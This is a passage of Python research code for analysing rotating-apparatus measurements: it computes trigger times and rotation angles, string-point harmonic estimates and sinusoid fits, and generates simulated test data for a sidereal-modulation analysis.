'meta'])\r\nLabSetData=namedtuple('LabSetData', ['t', 'sig', 'err', 'chi2', 'labTheta'])\r\n\r\n\r\n\r\ndef getRotationsFromRSpec(rSpec, numReps=1):\r\n if not iterable(rSpec.rotAngles):\r\n rotAngles=[rSpec.rotAngles]\r\n else:\r\n rotAngles=rSpec.rotAngles\r\n rotationSequence=array( [rSpec.extraRotAngle]+ [rotAngles[k] for k in arange(rSpec.numRotations-1, dtype='i4')%len(rotAngles)])\r\n allRotations=tile(rotationSequence, numReps)\r\n return allRotations\r\ndef getAnglesFromRSpec(rSpec, numReps=1):\r\n \"\"\" Return angles for the sequence defined by @rSpec, repeated @numReps times.\r\n Angles are that /before/ each rotation, including before the extraRotation\r\n\r\n \"\"\"\r\n #Logic here is a little screwy. We start with extraRotAngle then subtract it from everything\r\n # Also remember, following the logic on spin-doctor we only do the main rotation N-1 times, the last one being the 'extraRotation'\r\n \r\n allRotations=getRotationsFromRSpec(rSpec, numReps)\r\n allAngles= rSpec.startingAngle-rSpec.extraRotAngle + cumsum(allRotations)\r\n allAngles=allAngles.reshape((numReps, rSpec.numRotations))\r\n #allAngles=allAngles[:,:-1]\r\n #allAngles=tile(angles, (numReps,1) )+arange(numReps)[:,newaxis]*rSpec.extraRotAngle\r\n return allAngles\r\n\r\ndef makeTriggers(sd,rSpec, seqStartTimes=None, bIncludeExtraRot=True, gapBetween=False):\r\n \"\"\" Construct a set of triggers by analysing the timing for the\r\n signal.\r\n \"\"\"\r\n sdDiff=np.diff(sd); \r\n meanDt=np.mean(sdDiff) # Mean difference between 1 point and the next (should be 0.02s ish)\r\n meanDt=np.median(sdDiff) # (Maybe using the median will be more robust?)\r\n \r\n if gapBetween:\r\n vprint(\"You probably shouldn't be using the gapBetween argument to makeTriggers\")\r\n gapBetween=secs2sd(gapBetween)\r\n dataTime=secs2sd(rSpec.numRotations*rSpec.interval+rSpec.delay)\r\n seqStartTimes=arange(sd[0],sd[-1]-dataTime, (dataTime +gapBetween) )\r\n\r\n if seqStartTimes is None:\r\n mask=np.hstack([[True], sdDiff>8*meanDt]) #Make a mask array for where the difference is much greater than the average\r\n #The above should perhaps not start with at true, but a false? 
I imagine we start recording data BEFORE we send the first trigger, not the other-way around?\r\n\r\n seqStartTimes=sd[mask]; #We'll assume those points are where each sequence of rotations starts\r\n if len(seqStartTimes)==1:\r\n vprint(\"Maybe there's no gaps in the sequence? makeTriggers is only returning one set of triggers\")\r\n \r\n Ntrigs = rSpec.numRotations-1\r\n if bIncludeExtraRot:\r\n Ntrigs+=1\r\n group=secs2sd(np.arange(Ntrigs)*rSpec.interval+rSpec.delay); #A group is a group of triggers for 1 sequence\r\n\r\n trigTimes=[group+seqStartTimes[0]]; #Trig will be the list of all triggers which we slowly build up.\r\n for i in range(1, seqStartTimes.size): #(this could be easily vectorized, as the size of trigTimes is known in advance)\r\n if trigTimes[-1][-1]<seqStartTimes[i]:\r\n trigTimes.append(group+seqStartTimes[i])\r\n\r\n #angles=getAnglesFromRSpec(rSpec, seqStartTimes.size)#, bIncludeExtraRot=bIncludeExtraRot)\r\n return np.array(trigTimes)#, np.array(angles)\r\n\r\ndef sliceSorted(t, t_0, t_end=None, delta_t=None):\r\n \"\"\" Cut up the times @t into sections that start at t_0 and and at t_end OR t_0 + delta_t if they're all the same.\r\n\r\n Returns a list of index arrays with length t_0.size\r\n \"\"\"\r\n startIs=t.searchsorted(t_0.ravel()); #ravel here because x0 can be multi-d\r\n if t_end is not None:\r\n endIs = t.searchsorted(t_end.ravel())\r\n if delta_t is not None:\r\n raise Exception(\"should have t_end OR delta_t, not both!\")\r\n elif delta_t:\r\n endIs = t.searchsorted(t_0.ravel()+delta_t)\r\n\r\n startIs=startIs[endIs<t.size] #Throw out cuts where the end index is out of range\r\n endIs=endIs[:startIs.size]\r\n\r\n if t_0.ndim>1:\r\n #If we lose some part so we have an incomplete sequence, we'll dump them.\r\n Norphans=startIs.size%t_0.shape[-1] #this is only general for 2d- need rethinking for more dimensions\r\n if Norphans>0:\r\n startIs=startIs[:-Norphans]\r\n endIs=endIs[:-Norphans]\r\n\r\n newShape=[int(startIs.size/t_0.shape[-1]), t_0.shape[-1]]\r\n else: \r\n newShape=[endIs.size]\r\n\r\n indxL=empty(newShape, dtype='O')\r\n indxL.ravel()[:]=[np.r_[sI:eI] for sI,eI in zip(startIs, endIs)]\r\n\r\n return indxL\r\n\r\ndef sliceReduceData(x, y, x0, delta_x=None,endTimes=None, functionL=[np.size, np.mean, lambda vals, **kwargs: np.std(vals, **kwargs)/sqrt(np.size(vals))], bJustGiveCuts=False ):\r\n \"\"\"Cut the given x data at points starting from x0, and going to x0+delta_x, and perform the functions in functionL on each cut section. \r\n\r\n Returns meanXs. finalL, indxL\r\n \"\"\"\r\n \r\n if endTimes is None:\r\n endTimes = x0 + delta_x\r\n indxL=sliceSorted(x, x0, t_end=endTimes);\r\n\r\n if y.ndim==1:\r\n y=y[newaxis,:]\r\n tPtsL=[x[inds] for inds in indxL.flat]\r\n\r\n finalL=[]\r\n for yax in y:\r\n\r\n yPtsL=[yax[inds] for inds in indxL.flat]\r\n resL=[]\r\n for f in functionL: #Apply each function in the list to the cuts\r\n vals=[f(ys, axis=0) for ys in yPtsL]\r\n vals=array(vals).reshape(indxL.shape)\r\n resL.append(vals)\r\n processedL=np.array(resL)\r\n finalL.append(processedL)\r\n \r\n meanXs= (x0+endTimes)/2.# delta_x/2. 
# The mean time for each cut\r\n meanXs=meanXs.ravel()[:indxL.size].reshape(indxL.shape)\r\n\r\n if len(finalL)==1:\r\n finalL=finalL[0]\r\n return meanXs, finalL, indxL \r\n\r\ndef stringSimple3pt(x, err=None):\r\n coeffs=array([0.25, -0.5, 0.25])\r\n coeffs/=abs(coeffs).sum()\r\n cnv=convolve1d(x, coeffs, axis=0, mode='constant')[1:-1]\r\n if len(cnv.shape)>1:\r\n res=cnv.mean(axis=1) # Or median?\r\n if err is not None:\r\n raise ValueError(\"if x is 2d, this function will calculate errors so errors shouldn't be included\")\r\n err3pt = std(cnv, axis=1)/sqrt(x.shape[0])\r\n else: \r\n res=cnv\r\n err3pt= sqrt(convolve(err**2, coeffs**2,mode='valid'))\r\n st3pt=res* (arange(res.size)%2-0.5)*-2 #Multiply by [1,-1,1,-1]....\r\n\r\n\r\n return st3pt, err3pt\r\n\r\ndef stringSimple5pt(x, err=None, rotDir=1.):\r\n \"\"\"Calculate 5pt strings and errors\r\n \"\"\"\r\n #coeffs=array([0.25, -0.5, 0.25]) #Copy coefficients from matlab code\r\n coeffs=array([\r\n [ 0.25 , 0., -0.5, 0. , 0.25],\r\n [-0.25 , 0.5 , 0. , -0.5 , 0.25],\r\n [ 0.125 , -0.25 , 0.25 , -0.25 , 0.125 ]])\r\n #coeffs=array([[1.,0.,-2.,0.,1.], #1h0\r\n # [-1,2.,0.,-2.,1.], #1h90\r\n # [1,-2, 2, -2, 1]], #2h0\r\n # )\r\n #coeffs.T[:]/=abs(coeffs).sum(axis=1)\r\n N=len(x)-4\r\n resA=zeros([N, 4])\r\n errA=zeros([N, 4])\r\n for cf, r, e in zip(coeffs, resA.T, errA.T):\r\n cnv=convolve1d(x, cf, axis=0, mode='constant')[2:-2]\r\n #cnv=convolve1d(x, coeffs, axis=0, mode='constant')[2:-2]\r\n if len(cnv.shape)>1: #If x is 2d, we'll assume that each column represents repeated measurements of the same value\r\n thisRes=cnv.mean(axis=1) # (Maybe median would be better here?)\r\n if err is not None:\r\n raise ValueError(\"if x is 2d, this function will calculate errors so errors shouldn't be included\")\r\n thisErr = std(cnv, axis=1)/sqrt(x.shape[0])\r\n else: \r\n res=cnv\r\n thisErr= sqrt(convolve(err**2, cf**2,mode='valid')[2:-2])\r\n r[:]=thisRes\r\n e[:]=thisErr\r\n resA[:,-1]*=nan\r\n res1h=(resA[:,0] + 1j*resA[:,1])*exp(-1j*pi/2*arange(N))#%2-0.5)*-2\r\n err1h=(errA[:,0] + 1j*errA[:,1])*exp(+1j*pi/2*arange(N)) #(arange(N)%2-0.5)*-2\r\n errA[:,0],errA[:,1]=abs(err1h.real), abs(err1h.imag)\r\n\r\n resA[:,0]=res1h.real\r\n resA[:,1]=res1h.imag\r\n resA[:,2]=resA[:,2]*(arange(N)%2-0.5)*-2\r\n\r\n #st0=res[::2]\r\n #st90=res[1::2]\r\n #err0=err[::2]\r\n #err90=err[1::2]\r\n #st0=st0* (arange(st0.size)%2-0.5)*-2 #Multiply by [1,-1,1,-1]....\r\n #st90=st90* (arange(st90.size)%2-0.5)*-2 #Multiply by [1,-1,1,-1]....\r\n\r\n\r\n return resA.reshape([N,2,2]), errA.reshape([N,2,2])\r\n\r\ndef getHarmonicsFit( theta_in, x_in, errs_in=None, harmonics=[1], pars0=[1.,1.]):\r\n \"\"\"Calculate the harmonics present in the data x corresponding to phases theta.\r\n\r\n Here we'll fit to sin waves.\r\n Inputs theta_in, x_in, and errs_in may be 2d\r\n\r\n Returns:\r\n thL, ampL, covL (thetas, fitted a#mplitude, covariance- except currently only the diagonal components, i.e. variance)\r\n \"\"\"\r\n bOnlyOneHarmonic=False\r\n if not hasattr(harmonics, '__len__'): #If we haven't been given a list of harmonics, we'll assume it's a number\r\n bOnlyOneHarmonic=True\r\n\r\n theta_in=theta_in.ravel()\r\n x_in=x_in.ravel()\r\n #errs_in=errs_in[\r\n errs_in=errs_in.ravel()\r\n #if errs_in==None:\r\n #errs_in=ones(x.shape, dtype=x.dtype)\r\n #d_theta=theta[1]-theta[0]\r\n #theta=arange(0, d_theta*N, d_theta)\r\n N=theta_in.size\r\n thL=[]\r\n ampL=[]\r\n covL=[]\r\n chi2L=[]\r\n delt=0.1\r\n THx=theta_in[0]\r\n THy=THx+pi/2. 
#This is the sin phase, so it's before cos \r\n theta = theta_in-THx\r\n p_mn0=nanmean(x_in)\r\n #x=x_in-nanmean(x_in)\r\n x=x_in\r\n\r\n bSinQuad=True;\r\n bCosQuad=True;\r\n\r\n bTest=False\r\n if bTest:\r\n fig, [ax, ax2]=subplots(2,1)\r\n #ax=gca()\r\n ax.plot(theta_in, x)\r\n #ax.plot(theta_in, x_in, 'ro')\r\n ax.plot(theta_in, x, 'bo')\r\n for n in harmonics:\r\n if sum(abs(sin(theta[~isnan(x)])))/N <0.1: # Means there's not much data for the sin quadrature\r\n bSinQuad=False;\r\n if bSinQuad and bCosQuad:\r\n #[Ax, Ay, B], cov=nancurve_fit(lambda theta, ax,ay,b: ax*cos(n*theta)+ ay*sin(n*theta) + b, theta, x,p0=[0.5e-1,0.5e-1,1.],sigma=errs_in)# [0][0] #sin(n*theta)*x;\r\n f=lambda theta, ax,ay, mn: ax*sin(n*theta)+ ay*cos(n*theta) + mn\r\n [Ax, Ay, Xmn], cov=nancurve_fit(f, theta, x,p0=pars0+[p_mn0],sigma=errs_in**2, )#, absolute_sigma=True)# [0][0] #sin(n*theta)*x;\r\n if bTest:\r\n ax2.plot(theta_in, f(theta, Ax, Ay, Xmn))\r\n chi2= nansum((f(theta, Ax, Ay, Xmn)-x)**2*1./errs_in**2)/(sum(~isnan(x).ravel())-2)\r\n elif bCosQuad:\r\n #[Ax, B],cov=nancurve_fit(lambda theta, ax,b: ax*cos(n*theta) + b, theta, x,p0=[0.5e-1,1.],sigma=errs_in)\r\n f=lambda theta, ay, mn: ay*cos(n*theta) + mn\r\n [Ay, Xmn],cov=nancurve_fit(f, theta, x,p0=[pars0[0], p_mn0],sigma=errs_in)#, absolute_sigma=True)\r\n if bTest:\r\n ax2.plot(theta_in, f(theta, Ay, Xmn))\r\n Ax=nan\r\n THx=nan\r\n cov=array([[nan, nan], [nan, cov[0,0]]]) # Let's pretend we've got realy covariance\r\n chi2= nansum((f(theta, Ay, Xmn)-x)**2*1./errs_in**2)/(sum(~isnan(x).ravel())-1)\r\n elif bSinQuad: \r\n f=lambda theta, ax, mn: ax*sin(n*theta) + mn\r\n [Ax, Xmn],cov=nancurve_fit(f , theta, x,p0=[pars0[1], p_mn0],sigma=errs_in)#, absolute_sigma=True)\r\n if bTest:\r\n ax2.plot(theta_in, f(theta, Ax, Xmn))\r\n Ay=nan\r\n cov=array([[cov[0,0], nan], [nan, nan]]) # Cheating\r\n chi2= nansum((f(theta, Ax, Xmn)-x)**2*1./errs_in**2)/(sum(~isnan(x).ravel())-1)\r\n else:\r\n raise Exception('Error in getHarmonicsFit: input angles are probably unexpected?')\r\n \r\n if bTest:\r\n show()\r\n raw_input('Continue?')\r\n\r\n if bOnlyOneHarmonic:\r\n covL=cov\r\n ampL=(Ax,Ay)\r\n thL=(THx, THy)\r\n else:\r\n covL.append(cov)\r\n ampL.append((Ax,Ay))\r\n thL.append((THx, THy))\r\n chi2L.append(chi2)\r\n #covL.append(sqrt(diag(cov)))\r\n #covL.append((sqrt(cov_x[0][0]), sqrt(cov_y[0][0])))\r\n return thL, ampL, covL, chi2L\r\n\r\ndef mgStringHarmonics(theta, x, err=None, harmonics=[1], chi2Filter=inf):\r\n \"\"\" Input measurements x taken at angles theta0+ n* dtheta (assumed to be evenly spaced) and return harmonic components\r\n\r\n Returns: phi, amp, err, chi2\r\n where they each have the shape\r\n [ (val1, val2), (val1, val2)... ], where each tuple corresponds to a different harmonic and the individual components correspond to the different quadratures.\r\n incalculable values are replaced with \"nan\"\r\n\r\n That is, return the coefficients A1, A2 that fit the data for A1*sin(n*theta) + A2*cos(n*theta) for harmonic n, as well as standard deviations and chi^2\r\n \"\"\"\r\n # We'll assume that theta is evenly spaced for the moment\r\n assert(theta.shape[0]==x.shape[0])\r\n theta0=theta[0]\r\n dtheta=theta[1]-theta[0]\r\n if any(abs(diff(diff(theta)))>0.1): # Is the _change_ in step-size changing? (Why do we care??)\r\n if any(abs(abs(diff(theta))-pi) >0.1): #Maybe we're going back and forth by 180, in which case we can still operate\r\n raise ValueError(\"Theta values are apparently not evenly spaced. 
stringHarmonics can't handle this (yet)\")\r\n if (2*pi-0.05)%abs(dtheta) < 0.1:\r\n raise ValueError(\"string harmonics only implemented for dtheta that fits evenly into 2*pi\")\r\n\r\n #drnL=\r\n for H in harmonics:#range(4)+1: #count():\r\n rem=(pi+0.1)%(H*abs(dtheta))\r\n if abs(rem)<0.2: # Check that the angles are suitable, i.e. they're all at near 0, pi\r\n\r\n div=(pi)/(H*dtheta) #How many steps to get to a pi change in the signal\r\n nptString= round(2*abs(div)+1) #Use this to calculate the number of string points to use\r\n\r\n #Throw away outliers, without considering correlations\r\n if x.ndim>1:\r\n pterr=nanstd(x, axis=-1)\r\n pts=nanmean(x, axis=-1)\r\n else:\r\n pts=x\r\n badMask=isnan(pts)\r\n while 1:\r\n inv_variance=1./pterr**2\r\n inv_variance_sum=nansum(inv_variance[~badMask])\r\n sampleMean=nansum(pts[~badMask]*inv_variance[~badMask])/inv_variance_sum\r\n zsq=(pts-sampleMean)**2*inv_variance/inv_variance_sum\r\n zsq[badMask]=nan\r\n biggestDev=nanmax(zsq)\r\n if biggestDev>20 and 0:\r\n I=nanargmax(zsq)\r\n badMask[I]=True\r\n if sum(badMask)>5:\r\n badMask[:]=True\r\n vprint(\"Unrecoverable seq (too many points deviate)\")\r\n break\r\n else:\r\n break\r\n x[badMask]=nan \r\n \r\n #result = [[ nan, nan ]], [[ nan, nan ]], [[[ nan, nan ],[ nan,nan ]]], [[ nan, nan ]]\r\n minNumPts=2*nptString+1\r\n if nptString==3:\r\n st, stErr = stringSimple3pt(x, err)\r\n seq1, seqErr1, seqChi21= MT.fancy_column_stats(st, stErr, cf=3, chi2Max=chi2Filter, Nmin=5)\r\n result = array([[theta0, nan]]), array([seq1]), array([seqErr1]), array([seqChi21])\r\n elif nptString==5:\r\n st, stErr= stringSimple5pt(x, err, rotDir=sign(dtheta))\r\n seq1, seqErr1, seqChi21= MT.fancy_column_stats(st[:,0], stErr[:,0], cf=5, chi2Max=chi2Filter, Nmin=5)\r\n seq2, seqErr2, seqChi22= MT.fancy_column_stats(st[:,1], stErr[:,1], cf=5, chi2Max=chi2Filter, Nmin=5)\r\n result = array([[theta0, theta0-dtheta], [theta0, nan+theta0+abs(dtheta)/2]]), array([seq1, seq2]), array([seqErr1, seqErr2]), array([seqChi21, seqChi22])\r\n vprint(\"th:{}, seq2:{}\".format(theta0%(2*pi), seq2))\r\n else:\r\n print(\"nptString is {0}\".format(nptString))\r\n\r\n\r\n # CHI2 ELIMINATION\r\n ## While the set of string points doesn't fit a chi2 model, we eliminate the largest deviating points\r\n\r\n if 0:\r\n while 1:\r\n inv_variance=1./stErr**2; # Variance from individual error bars\r\n inv_variance_sum=nansum(inv_variance)\r\n ampFinal=nansum(st*inv_variance)/inv_variance_sum\r\n\r\n N=sum(~isnan(st))\r\n cf=3.*((N-1)/N)**2# 'Correlation factor': Used to be 2.54. This stuff is (ftm) worked out emprically\r\n degOfF=N/cf \r\n devSq=(st-ampFinal)**2*inv_variance\r\n chi2=nansum(devSq)/degOfF; #: = var(st)/varfromerrorbars Needs checking too.\r\n if chi2>chi2Filter:\r\n I=nanargmax(devSq)#/nanvar(st)\r\n #I=nanargmax(dev)\r\n st[I]=nan\r\n stErr[I]=nan\r\n if sum(~isnan(st))<minNumPts: #if we have too few points left\r\n vprint(\"too many bad string points (by chi2 limit) \"),\r\n st[:]=nan\r\n stErr[:]=nan\r\n ampFinal=nan\r\n break;\r\n else:\r\n break\r\n\r\n #Decide if there were too many points thrown out:\r\n N=sum(~isnan(st))\r\n if N < minNumPts and 1: #If there's less than a few independent string points remaining, we'll give up\r\n #vprint(\"Unrecoverable sequence\")\r\n return [(theta0, nan)], [(nan, nan)], [[[nan,nan],[nan,nan]]], [(nan, nan)]\r\n #adjDegOfF=stats.chi2.ppf(.5, N -2.549); #Adjusted degrees of freedom for calculating chi2\r\n cf=3.*((N-1)/N)**2# Used to be 2.54. 
This stuff is (atm) worked out emprically\r\n degOfF=N/cf \r\n chi2=nansum(((st-ampFinal)**2)*inv_variance)/degOfF; #: = var(st)/varfromerrorbars Needs checking too.\r\n\r\n errFinal=sqrt(nansum((st-ampFinal)**2*inv_variance/inv_variance_sum)/degOfF*sqrt(2))#/sqrt(1-stats.chi2.cdf(chi2, degOfF));\r\n\r\n #Assemble the results\r\n result= array([[nan, nan]]), array([[nan, nan]]), array([[[nan, nan], [nan, nan]]]), array([[nan, nan]])\r\n\r\n #result[0][0]=[theta0,nan]\r\n #result[1][0]=[ampFinal,nan]\r\n #result[2][0]=[[[errFinal,nan],[nan,nan]]]\r\n #result[3][0]=[[chi2,nan]]\r\n\r\n\r\n #return [(theta0, nan)], [(ampFinal, nan)], [[[errFinal,nan],[nan,nan]]], [(chi2, nan)]\r\n\r\n\r\n\r\n\r\n else:\r\n print(\"abs(rem)!<0.2 for dtheta = {0}, H = {1}. Can't do string analysis on these\".format(dtheta, H))\r\n #This should probably raise an exception\r\n\r\n result[0][0]=[nan,nan]\r\n result[1][0]=[nan,nan]\r\n result[2][0]=[[[nan,nan],[nan,nan]]]\r\n result[3][0]=[[nan,nan]]\r\n break;\r\n return result\r\n \r\ndef renameFieldMaybe(recArray, oldName, newName):\r\n names=list(recArray.dtype.names)\r\n try:\r\n I=names.index(oldName)\r\n names[I]=newName\r\n recArray.dtype.names=names\r\n except ValueError:\r\n pass;\r\n return recArray\r\n\r\ndef addFakeData(rawAmp, apparatusAngles=None,trigs=None, rotationRate=None, amp=1., sigma=0., phi=0, amp2=0, phi2=0, zeroingTime=100, fracDev=0, sizeDev=0.1, fastAddF=None, bBlankOriginalData=False):\r\n \"\"\" Add fake signal/noise to an existing signal\r\n\r\n \"\"\"\r\n sd=rawAmp.t\r\n sig=rawAmp.sig.copy()\r\n if bBlankOriginalData:\r\n sig*=0\r\n\r\n if apparatusAngles is not None:\r\n theta= 2*pi*sd +phi+ apparatusAngles[:,:,newaxis] # Angle of the apparatus with respect to the cosmo \r\n # Now to cut the data into 'sequences'\r\n #seqStartTimes=arange(0,totTime, secs2sd(rSpec.delay + rSpec.interval*rSpec.numRotations + zeroingTime))+startTime\r\n\r\n\r\n #thPtsL=[theta[inds] for inds in indxL.flat]\r\n #apparatusAngles=getAnglesFromRSpec(rSpec, numReps=len(pretrigs))/180.*pi\r\n #theta=hstack(array(thPtsL) +apparatusAngles.ravel()[:len(thPtsL)])\r\n #flat_ind=indxL.ravel() #OR something else??\r\n\r\n elif rotationRate is not None:\r\n theta= 2*pi*sd + phi + 2*pi*rotationRate*sd2secs(sd)\r\n else:\r\n raise ValueError(\"Need to include either apparatusAngles or rotationRate\")\r\n\r\n fast_noiseF=lambda t: random.normal(size=t.size, scale=sigma) if sigma>0 else 0\r\n\r\n sig+= amp*sin(theta) + amp2*sin(2*theta+phi2) #add base signal\r\n\r\n #Random outlier additions:\r\n sig+= where(rand(*sig.shape)>fracDev, 0, sizeDev)\r\n #hstack([zeros(inds.shape) if rand()>fracDev else sizeDev*ones(inds.shape) for inds in indxL.flat ])\r\n\r\n #Uniform noise\r\n #sd=hstack(tPtsL)\r\n sig+= fast_noiseF(sd)\r\n \r\n #Repetitive noise\r\n if fastAddF is not None:\r\n addN=hstack([fastAddF(sd2secs(tPts-tPts[0])) for tPts in tPtsL ])\r\n sig+=addN\r\n #sig[ind]+=fastAddF(sd[ind]-sd[ind[0]])\r\n\r\n if bTest:\r\n figure('TestAddFakeData')\r\n ax=subplot(311)\r\n plot(sd, sig,',')\r\n subplot(312, sharex=ax)\r\n plot(trigs.flatten(), apparatusAngles.flatten(),'-o')\r\n subplot(313)\r\n plot(trigs.flatten(),'o')\r\n\r\n return RawData(sd, sig)#SPDataSet('test', preloadDict={'fastD':[sd, sig, ['sig']]}, rSpec=rSpec)\r\n\r\n #return SPDataSet(fastD=[sd, sig, ['sig']])\r\n\r\n\r\n return cutAmpAdded\r\n\r\ndef makeTestData(rSpec, amp=1., amp2=0.0, sigma=5., N=100000, sampleRate=10, phi=0, phi2=0, zeroingTime=100, fracDev=0, sizeDev=0.1, fastAddF=None, startTime=0):\r\n 
\"\"\" Make up some data that the experiment _might_ have measured\r\n\r\n Plan: 1. Make a pure signal, and add some noise. 2. Calculate the component that would be measured in each orientation. 3. Add white noise.. \r\n \"\"\"\r\n\r\n S1cosmos=amp*exp(1j*phi)\r\n S2cosmos=amp2*exp(1j*2*phi2)\r\n\r\n totTime=secs2sd(N/sampleRate) #Total time of the set in sidereal days\r\n #zeroingTime=100 #How long to wait between sequences\r\n #phi=pi/3 #Signal phase\r\n sd= linspace(0,totTime, N) + startTime\r\n theta= 2*pi*sd # Angle of the room with respect to the cosmos\r\n fast_noiseF=lambda t: random.normal(size=t.size, scale=sigma)\r\n\r\n \r\n # Now to cut the data into 'sequences'\r\n seqStartTimes=arange(0,totTime, secs2sd(rSpec.delay + rSpec.interval*rSpec.numRotations + zeroingTime))+startTime\r\n\r\n trigs=makeTriggers(sd, rSpec, seqStartTimes=seqStartTimes, bIncludeExtraRot=True);\r\n #theta=theta/180*pi\r\n\r\n pretrigs=trigs[:,0]-secs2sd(rSpec.delay)\r\n startTimes=hstack([pretrigs[:,newaxis],trigs[:,:-1]])\r\n endTimes=trigs\r\n\r\n\r\n #tPtsL,thPtsL,indxL= sliceReduceData(sd, theta, x0=startTimes.ravel(), endTimes=endTimes.ravel(), bJustGiveCuts=True)\r\n #Get the indices divided up according to the triggers\r\n indxL= sliceSorted(sd, t_0=startTimes.ravel(), t_end=endTimes.ravel()) #indices of the points between each rotation\r\n tPtsL=[sd[inds] for inds in indxL.flat]\r\n thPtsL=[theta[inds] for inds in indxL.flat]\r\n\r\n apparatusAngles=getAnglesFromRSpec(rSpec, numReps=len(seqStartTimes+1))/180.*pi\r\n theta=hstack(array(thPtsL) +apparatusAngles.ravel()[:len(thPtsL)]) #angle of apparatus with respect to the cosmos\r\n \r\n sig=real(S1cosmos*exp(-1j*theta) + S2cosmos*exp(-1j*2*theta))\r\n #sig= amp*sin(theta + phi) + amp2*sin(2*theta + phi2)#Base signal\r\n\r\n #Random outlier additions:\r\n sig+=hstack([zeros(inds.shape) if rand()>fracDev else sizeDev*ones(inds.shape) for inds in indxL.flat ])\r\n\r\n #Uniform noise\r\n sd=hstack(tPtsL)\r\n sig+= fast_noiseF(sd)\r\n \r\n #Repetitive noise\r\n if fastAddF is not None:\r\n addN=hstack([fastAddF(sd2secs(tPts-tPts[0])) for tPts in tPtsL ])\r\n sig+=addN\r\n #sig[ind]+=fastAddF(sd[ind]-sd[ind[0]])\r\n\r\n if bTest:\r\n figure('TestMakeTestData')\r\n ax=subplot(311)\r\n plot(sd, sig,',')\r\n subplot(312, sharex=ax)\r\n plot(trigs.flatten(), apparatusAngles.flatten(),'-o')\r\n subplot(313)\r\n plot(trigs.flatten(),'o')\r\n\r\n return sd, sig#SPDataSet('test', preloadDict={'fastD':[sd, sig, ['sig']]}, rSpec=rSpec)\r\n #return SPDataSet(fastD=[sd, sig, ['sig']])\r\n\r\ndef group_by_axis(thetaIn):\r\n theta=thetaIn[~isnan(thetaIn)]\r\n absC=cos(theta)**2\r\n absS=sin(theta)**2\r\n sQ=mean(absS)\r\n cQ=mean(absC)\r\n #if any(theta%(2*pi)\r\n if any( abs(theta%(pi) -pi/2) <0.05 ) and abs(0.5-sQ <0.05) and abs(0.5 -cQ) <0.05: # If we have a near-uniform sampling of angles...\r\n thetaRef=0;\r\n\r\n else: # Otherwise we'll try to pick a good angle (This is not perfect by any means)\r\n thetaRef=arctan2(sQ, cQ);\r\n print(\"Data doesn't seem to be purely NS->EW. Setting main angle as {0} deg\".format(thetaRef/pi*180))\r\n #pdb.set_trace()\r\n absC=abs(cos(thetaIn-thetaRef))\r\n absS=abs(sin(thetaIn-thetaRef))\r\n\r\n xI=where(absC>0.99)[0] # Points \r\n yI=where(absS>0.99)[0] # P\r\n if len(yI)<4:\r\n vprint(\"Not enough data points for orthogonal quadrature. 
Set yI =[]\")\r\n yI=[]\r\n if MT.nearby_angles(thetaRef, pi/2, 0.1):\r\n xI,yI=yI,xI\r\n thetaRef=0\r\n return thetaRef, xI, yI\r\n\r\n\r\n\r\ndef rotate_sequence_amps(seqAmp, rotateTo=0):\r\n \"\"\"\r\n >>> N=100\r\n >>> th=linspace(0,20,N)%(2*pi)\r\n >>> sa= CorrelationData(linspace(0,1,N), sin(2*th), ones(N))\r\n\r\n \"\"\"\r\n rotAmp=deepcopy(seqAmp)\r\n for h in range(rotAmp.sig.shape[1]):\r\n #newThetas, newSig, newErr=zip(*[th, s, er for th, s, er in zip(sig.theta[:,h], sig.sig[:,h], sig.err[:,h])])\r\n zipped=zip(seqAmp.theta[:,h], seqAmp.sig[:,h], seqAmp.err[:,h]) \r\n rotAmp.theta[:,h], rotAmp.sig[:,h], rotAmp.err[:,h]=zip(*[MT.rotate_quadrature_sample(th*(h+1), s, er,\r\n rotateTo=rotateTo, debug=True) if not all(isnan(s)) else (th, s, er) for (th, s, er) in zipped])\r\n rotAmp.theta[:,h]/=(h+1)\r\n return rotAmp\r\n\r\ndef process_sequences_multifit(sig, sigSensL, sigSensVaryPhaseIs=[], subtractHarmsL=[], minFreq=None, maxFreq=None, bPlot=False, harmonic=1):\r\n \"\"\" \r\n \"\"\"\r\n h=harmonic-1\r\n varyPhaseIndL=[]\r\n #sig=CorrelationData(*[c[:,h::h+1] for c in s]) for s in sig]\r\n #sigSensL=[CorrelationData(*[c[:,h:] for c in s]) for s in sigSensL]\r\n t=sig.t[:,h,0]\r\n #_, sig1h, cov1h=MT.rotate_quadrature_sample(sig.theta[:,0,0], sig.sig[:,0], sig.err[:,0])\r\n thetaRef, xI, yI=group_by_axis(sig.theta[:,0]) \r\n\r\n vprint(\"Main angle (for sidereal fit): {0}\".format(thetaRef))\r\n sigRot=rotate_sequence_amps(sig, rotateTo=0)\r\n \r\n sigSensL=[rotate_sequence_amps(sigSens, rotateTo=thetaRef) for sigSens in\r\n sigSensL]\r\n yL=[sigSens.sig[:,h] for sigSens in sigSensL]\r\n if sigSensVaryPhaseIs:\r\n varyPhaseIndL.extend(sigSensVaryPhaseIs)\r\n print(\"Allowing phase for sensors at {0} to vary\".format(sigSensVaryPhaseIs))\r\n\r\n gdQuads=[]\r\n for k,th, s in zip(arange(sigRot.theta.shape[2]), sigRot.theta[:,h,:].T, sigRot.sig[:,h,:].T):\r\n notNan=th[~isnan(s)]\r\n if notNan.size:\r\n gdQuads.append(k)\r\n if not all(MT.nearby_angles(notNan, notNan.min(), 0.1)):\r\n vprint(\"Not all angles the same: maybe they're orthogonal?\")\r\n\r\n #yL.append(vstack([sin(2*pi*t+sig.theta[:,0]), cos(2*pi*t + sig.theta[:,0])]).T)\r\n #Lab frame signal\r\n dc=ones(t.size, dtype='f8')\r\n yL.append(vstack([dc, dc*0]).T)\r\n varyPhaseIndL.append(len(yL)-1)\r\n # Sidereal\r\n refThetas=sigRot.theta.copy()\r\n if len(gdQuads)==1:\r\n if 0 in gdQuads:\r\n refThetas[:,h,1]=refThetas[:,h,0]+pi/2/harmonic\r\n else:\r\n refThetas[:,h,0]=refThetas[:,h,1]-pi/2/harmonic\r\n\r\n yL.append(1*cos(2*harmonic*pi*t[:,newaxis]+harmonic*refThetas[:,h]))\r\n varyPhaseIndL.append(len(yL)-1)\r\n\r\n #Add the 3rd harmonic ot the list(if it's there), and let it vary phase\r\n for harm in subtractHarmsL:\r\n if sigRot.sig.shape[1]>=harm:\r\n #_, sigH, covH=MT.rotate_quadrature_sample(sig.theta, sig.sig[:,h-1], sig.err[:,h-1])\r\n yL.append(sigRot.sig[:,harm-1])\r\n varyPhaseIndL.append(len(yL)-1)\r\n else:\r\n print(\"{}th harmonic doesn't exist, can't subtract it\")\r\n\r\n #nanIs=isnan(sigRot.sig[:,0])\r\n sig2fit=sig\r\n fitparams, cov, adjchi2, 